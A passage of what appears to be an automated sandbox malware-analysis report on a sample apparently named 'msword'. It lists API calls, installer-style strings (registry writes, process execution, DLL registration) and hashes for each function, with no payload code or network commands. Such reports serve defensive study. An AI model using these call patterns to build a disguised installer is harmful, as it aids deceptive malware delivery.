                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                    • String ID: F$%s=%s$NUL$[Rename]
                                                                    • API String ID: 565278875-1653569448
                                                                    • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                    • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                    • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                    • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                    • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                    • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                    • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                    • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                    • API String ID: 1641139501-220328614
                                                                    • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                    • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                    • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                    Strings
                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                    • String ID: created uninstaller: %d, "%s"
                                                                    • API String ID: 3294113728-3145124454
                                                                    • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                    • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                    • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                    Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3734993849-2769509956
                                                                    • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                    • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                    • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                    Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                    • GetSysColor.USER32(00000000), ref: 00403E00
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                    • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                    • GetSysColor.USER32(?), ref: 00403E2B
                                                                    • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                    • DeleteObject.GDI32(?), ref: 00403E55
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                    Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                    Strings
                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                    • API String ID: 1033533793-945480824
                                                                    • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                    • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                    Strings
                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                    • Exec: command="%s", xrefs: 00402241
                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                    • API String ID: 2014279497-3433828417
                                                                    • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                    • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                    Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                    • MulDiv.KERNEL32(00015600,00000064,?), ref: 00403295
                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
